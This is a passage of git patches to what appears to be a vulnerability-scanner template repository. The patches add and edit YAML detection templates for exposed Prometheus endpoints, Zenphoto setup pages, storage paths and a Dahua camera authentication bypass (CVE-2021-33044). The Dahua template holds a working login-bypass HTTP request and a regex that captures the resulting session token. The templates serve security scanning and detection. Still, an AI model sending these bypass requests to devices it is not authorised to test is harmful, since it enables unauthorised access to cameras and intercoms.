72 | token-spray | 63 | | | | | +| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 165 | madrobot | 63 | file | 50 | | | | | **176 directories, 2382 files**. From 3175b12b22c56f192e7168e703dab9afaf27d3e7 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 19 Oct 2021 03:19:32 +0530 Subject: [PATCH 40/54] Additional matcher --- cves/2021/CVE-2021-3577.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2021/CVE-2021-3577.yaml b/cves/2021/CVE-2021-3577.yaml index 17f750ee26..bb18f9d825 100644 --- a/cves/2021/CVE-2021-3577.yaml +++ b/cves/2021/CVE-2021-3577.yaml @@ -32,3 +32,7 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + + - type: word + words: + - "set_city_timezone" \ No newline at end of file From c9f2ef68edb190553799d329b3a8afd57bf94584 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 18 Oct 2021 17:28:10 -0500 Subject: [PATCH 41/54] Update prometheus-config-endpoint.yaml --- exposures/configs/prometheus-config-endpoint.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/configs/prometheus-config-endpoint.yaml b/exposures/configs/prometheus-config-endpoint.yaml index 4529496b0d..4f23f90587 100644 --- a/exposures/configs/prometheus-config-endpoint.yaml +++ b/exposures/configs/prometheus-config-endpoint.yaml @@ -18,6 +18,8 @@ requests: - type: status status: - 200 + + - type: word words: - "job_name:" - "params:" From 667ee78cb5ead4e6a366e60c37290a03e85a7c1e Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 18 Oct 2021 23:09:27 -0300 Subject: [PATCH 42/54] Update sensitive-storage-exposure.yaml --- exposures/files/sensitive-storage-exposure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/files/sensitive-storage-exposure.yaml b/exposures/files/sensitive-storage-exposure.yaml index 5db4e2330b..a65916dea3 100644 --- a/exposures/files/sensitive-storage-exposure.yaml +++ b/exposures/files/sensitive-storage-exposure.yaml @@ -15,6 +15,7 @@ requests: - "{{BaseURL}}/server/storage/" - "{{BaseURL}}/intikal/storage/" - "{{BaseURL}}/elocker_old/storage/" + stop-at-first-match: true matchers-condition: and matchers: - type: word From 69953cf73e7a2bffe1a9a1b1cf5939ae72bbe230 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 18 Oct 2021 23:18:31 -0300 Subject: [PATCH 43/54] Update zenphoto-sensitive-info.yaml --- misconfiguration/zenphoto-sensitive-info.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/misconfiguration/zenphoto-sensitive-info.yaml b/misconfiguration/zenphoto-sensitive-info.yaml index 5f9225ea95..c5ecb3bf15 100644 --- a/misconfiguration/zenphoto-sensitive-info.yaml +++ b/misconfiguration/zenphoto-sensitive-info.yaml @@ -15,7 +15,8 @@ requests: - '{{BaseURL}}/zp/zp-core/setup/index.php' - '{{BaseURL}}/gallery/zp-core/setup/index.php' - '{{BaseURL}}/zp-core/setup/index.php' - + + stop-at-first-match: true matchers-condition: and matchers: - type: word From 02655a9f22835bcec6ab41dc9e5c8648ab6f308b Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 19 Oct 2021 12:44:56 +0900 Subject: [PATCH 44/54] Create CVE-2021-33044.yaml The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-33044.yaml | 50 +++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 cves/2021/CVE-2021-33044.yaml diff --git a/cves/2021/CVE-2021-33044.yaml b/cves/2021/CVE-2021-33044.yaml new file mode 100644 index 0000000000..af32840093 --- /dev/null +++ b/cves/2021/CVE-2021-33044.yaml @@ -0,0 +1,50 @@ +id: CVE-2021-33044 + +info: + name: Dahua IPC/VTH/VTO devices Authentication Bypass + author: gy741 + severity: critical + tags: dahua,cve,cve2021,bypass + description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 + - https://github.com/dorkerdevil/CVE-2021-33044 + - https://seclists.org/fulldisclosure/2021/Oct/13 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-33044 + cwe-id: CWE-287 + +requests: + - raw: + - | + POST /RPC2_Login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: application/json, text/javascript, */*; q=0.01 + Connection: close + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Origin: http://{{Hostname}}/ + Referer: http://{{Hostname}}/ + Accept-Language: en-US,en;q=0.9 + + {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0} + + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: word + part: body + words: + - "true" + - "id" + - "params" + - "session" + condition: and From 181dda73eceb25113f1ea9a3f609f9e6f590bdf6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 17:44:06 +0530 Subject: [PATCH 45/54] Update CVE-2021-33044.yaml --- cves/2021/CVE-2021-33044.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-33044.yaml b/cves/2021/CVE-2021-33044.yaml index af32840093..7797b9e08e 100644 --- a/cves/2021/CVE-2021-33044.yaml +++ b/cves/2021/CVE-2021-33044.yaml @@ -4,32 +4,29 @@ info: name: Dahua IPC/VTH/VTO devices Authentication Bypass author: gy741 severity: critical - tags: dahua,cve,cve2021,bypass description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 - https://github.com/dorkerdevil/CVE-2021-33044 + - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 - https://seclists.org/fulldisclosure/2021/Oct/13 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-33044 cwe-id: CWE-287 + tags: dahua,cve,cve2021,auth-bypass requests: - raw: - | POST /RPC2_Login HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - Accept-Encoding: gzip, deflate Accept: application/json, text/javascript, */*; q=0.01 Connection: close X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://{{Hostname}}/ Referer: http://{{Hostname}}/ - Accept-Language: en-US,en;q=0.9 {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0} @@ -48,3 +45,10 @@ requests: - "params" - "session" condition: and + + extractors: + - type: regex + group: 1 + part: body + regex: + - ',"result":true,"session":"([a-z]+)"\}' From 52e498506ecbc88a80365d33a4276881bfe7de77 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 17:45:19 +0530 Subject: [PATCH 46/54] Update zenphoto-sensitive-info.yaml --- misconfiguration/zenphoto-sensitive-info.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/zenphoto-sensitive-info.yaml b/misconfiguration/zenphoto-sensitive-info.yaml index c5ecb3bf15..b3ba0c441a 100644 --- a/misconfiguration/zenphoto-sensitive-info.yaml +++ b/misconfiguration/zenphoto-sensitive-info.yaml @@ -15,7 +15,7 @@ requests: - '{{BaseURL}}/zp/zp-core/setup/index.php' - '{{BaseURL}}/gallery/zp-core/setup/index.php' - '{{BaseURL}}/zp-core/setup/index.php' - + stop-at-first-match: true matchers-condition: and matchers: From 7016e71473d91a1474dce3bafeda19f7df6802f7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 20:27:46 +0530 Subject: [PATCH 47/54] Update prometheus-config-endpoint.yaml --- exposures/configs/prometheus-config-endpoint.yaml | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/exposures/configs/prometheus-config-endpoint.yaml b/exposures/configs/prometheus-config-endpoint.yaml index 4f23f90587..7b6150eb2e 100644 --- a/exposures/configs/prometheus-config-endpoint.yaml +++ b/exposures/configs/prometheus-config-endpoint.yaml @@ -21,8 +21,12 @@ requests: - type: word words: - - "job_name:" - - "params:" - - "module:" - - "targets:" + - 'job_name:' + - '{"status":"success","data":' + - 'targets:' condition: and + + - type: word + part: header + words: + - 'application/json' From 10c23143675134c9207b71ad12437950cd40cd38 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 20:32:37 +0530 Subject: [PATCH 48/54] Update prometheus-flags-endpoint.yaml --- exposures/configs/prometheus-flags-endpoint.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/exposures/configs/prometheus-flags-endpoint.yaml b/exposures/configs/prometheus-flags-endpoint.yaml index c249c865f3..3f139d1ec3 100644 --- a/exposures/configs/prometheus-flags-endpoint.yaml +++ b/exposures/configs/prometheus-flags-endpoint.yaml @@ -3,9 +3,9 @@ id: prometheus-flags-endpoint info: name: Exposure of sensitive operational information via Prometheus flags API endpoint author: geeknik + severity: medium description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username. reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - severity: medium tags: prometheus,exposure requests: @@ -23,6 +23,11 @@ requests: - '"config.file":' condition: and + - type: word + part: header + words: + - 'application/json' + extractors: - type: regex name: web_admin_enabled From 8d36ebe1d6082bb8660c58405e873397c4f21e0a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 20:32:48 +0530 Subject: [PATCH 49/54] Update prometheus-config-endpoint.yaml --- exposures/configs/prometheus-config-endpoint.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/prometheus-config-endpoint.yaml b/exposures/configs/prometheus-config-endpoint.yaml index 7b6150eb2e..b454c38383 100644 --- a/exposures/configs/prometheus-config-endpoint.yaml +++ b/exposures/configs/prometheus-config-endpoint.yaml @@ -3,9 +3,9 @@ id: prometheus-config-endpoint info: name: Exposure of sensitive operational information via Prometheus config API endpoint author: geeknik + severity: high description: The config endpoint returns the loaded Prometheus configuration file. This file also contains addresses of targets and alerting/discovery services alongside the credentials required to access them. Usually, Prometheus replaces the passwords in the credentials config configuration field with the placeholder (although this still leaks the username). reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - severity: high tags: prometheus,exposure requests: From 2893847959dfa12c2cc4eaec0c4c00207dfba865 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 20:34:13 +0530 Subject: [PATCH 50/54] Update prometheus-flags-endpoint.yaml --- exposures/configs/prometheus-flags-endpoint.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/configs/prometheus-flags-endpoint.yaml b/exposures/configs/prometheus-flags-endpoint.yaml index 3f139d1ec3..2f4110f253 100644 --- a/exposures/configs/prometheus-flags-endpoint.yaml +++ b/exposures/configs/prometheus-flags-endpoint.yaml @@ -18,6 +18,8 @@ requests: - type: status status: - 200 + + - type: word words: - '"data":' - '"config.file":' From 6d13118df62b541c0648b16da09ff59d77d6e002 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 20:35:34 +0530 Subject: [PATCH 51/54] Update prometheus-targets-endpoint.yaml --- exposures/configs/prometheus-targets-endpoint.yaml | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/exposures/configs/prometheus-targets-endpoint.yaml b/exposures/configs/prometheus-targets-endpoint.yaml index 9d29d621c6..e5adf58b1a 100644 --- a/exposures/configs/prometheus-targets-endpoint.yaml +++ b/exposures/configs/prometheus-targets-endpoint.yaml @@ -3,9 +3,9 @@ id: prometheus-targets-endpoint info: name: Exposure of sensitive operational information via Prometheus targets API endpoint author: geeknik + severity: high description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer’s knowledge. reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - severity: high tags: prometheus,exposure requests: @@ -18,8 +18,14 @@ requests: - type: status status: - 200 + + - type: word words: - - "Endpoint" - - "State" - - "Labels" + - '{"status":"success","data":' + - 'Labels' condition: and + + - type: word + part: header + words: + - 'application/json' From a25a9f302007ed9c0906f6ca635c94d67d9eb608 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 22:25:44 +0530 Subject: [PATCH 52/54] Update prometheus-targets-endpoint.yaml --- exposures/configs/prometheus-targets-endpoint.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/configs/prometheus-targets-endpoint.yaml b/exposures/configs/prometheus-targets-endpoint.yaml index e5adf58b1a..cd326bed1c 100644 --- a/exposures/configs/prometheus-targets-endpoint.yaml +++ b/exposures/configs/prometheus-targets-endpoint.yaml @@ -1,9 +1,9 @@ id: prometheus-targets-endpoint info: - name: Exposure of sensitive operational information via Prometheus targets API endpoint + name: Prometheus targets API endpoint author: geeknik - severity: high + severity: info description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer’s knowledge. reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ tags: prometheus,exposure From 1d70ac6ccbed1fb428955062d72d3f6e3fc08951 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 22:26:31 +0530 Subject: [PATCH 53/54] Update prometheus-flags-endpoint.yaml --- exposures/configs/prometheus-flags-endpoint.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/configs/prometheus-flags-endpoint.yaml b/exposures/configs/prometheus-flags-endpoint.yaml index 2f4110f253..0cefa431fc 100644 --- a/exposures/configs/prometheus-flags-endpoint.yaml +++ b/exposures/configs/prometheus-flags-endpoint.yaml @@ -1,9 +1,9 @@ id: prometheus-flags-endpoint info: - name: Exposure of sensitive operational information via Prometheus flags API endpoint + name: Prometheus flags API endpoint author: geeknik - severity: medium + severity: info description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username. reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ tags: prometheus,exposure From 8a698222851ce804e558d5c68ddab013e6b627ca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 22:26:52 +0530 Subject: [PATCH 54/54] Update prometheus-config-endpoint.yaml --- exposures/configs/prometheus-config-endpoint.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/configs/prometheus-config-endpoint.yaml b/exposures/configs/prometheus-config-endpoint.yaml index b454c38383..bfc9ce9b45 100644 --- a/exposures/configs/prometheus-config-endpoint.yaml +++ b/exposures/configs/prometheus-config-endpoint.yaml @@ -1,9 +1,9 @@ id: prometheus-config-endpoint info: - name: Exposure of sensitive operational information via Prometheus config API endpoint + name: Prometheus config API endpoint author: geeknik - severity: high + severity: info description: The config endpoint returns the loaded Prometheus configuration file. This file also contains addresses of targets and alerting/discovery services alongside the credentials required to access them. Usually, Prometheus replaces the passwords in the credentials config configuration field with the placeholder (although this still leaks the username). reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ tags: prometheus,exposure